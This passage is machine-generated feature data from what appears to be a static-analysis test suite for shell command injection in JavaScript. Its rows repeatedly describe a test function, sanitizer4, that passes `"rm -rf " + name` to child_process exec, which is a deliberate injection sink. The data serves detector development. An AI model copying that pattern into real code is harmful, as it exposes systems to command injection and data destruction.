name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | return of anonymous function | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:39:509:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:3 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:3 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:8 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:5:510:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:5:510:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:5:510:8 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:5:510:8 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:5:510:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:18 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:10:510:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:22:510:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:22:510:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:22:510:25 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:22:510:25 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:22:510:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:22:510:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:10 | isNaN | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:10 | isNaN | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:10 | isNaN | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:10 | isNaN | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:10 | isNaN | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | exceptional return of isNaN(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | exceptional return of isNaN(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | exceptional return of isNaN(name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 